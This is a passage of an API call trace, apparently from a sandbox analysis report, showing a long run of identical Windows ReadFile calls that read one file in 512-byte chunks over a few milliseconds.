lpOverlapped=0x0) returned 1 [0142.936] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.936] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.936] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.936] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.936] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.936] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.936] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.936] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.936] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.937] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.937] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.937] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.937] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.937] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.937] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.937] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.937] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.937] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.937] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.937] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.938] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.938] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.938] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.938] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.938] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.938] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.938] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.938] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.938] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.938] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.938] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.938] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.939] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.939] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.939] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.939] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.939] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.939] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.939] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.939] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.939] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.939] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.940] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.940] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.940] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.940] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.940] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.940] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.940] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.940] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.940] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.940] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.940] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.940] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.940] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.941] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.941] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.941] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.941] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.941] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.941] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.941] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.941] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.941] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.941] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.941] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.942] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.942] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.942] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.942] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.942] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.942] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.942] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.942] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.942] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.942] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.942] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.942] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.942] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.943] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.943] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.943] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.943] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.943] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.943] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.943] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.943] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.943] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.943] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.943] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.944] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.944] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.944] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.944] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.944] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.944] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.944] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.944] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.944] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.944] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.944] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.944] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, 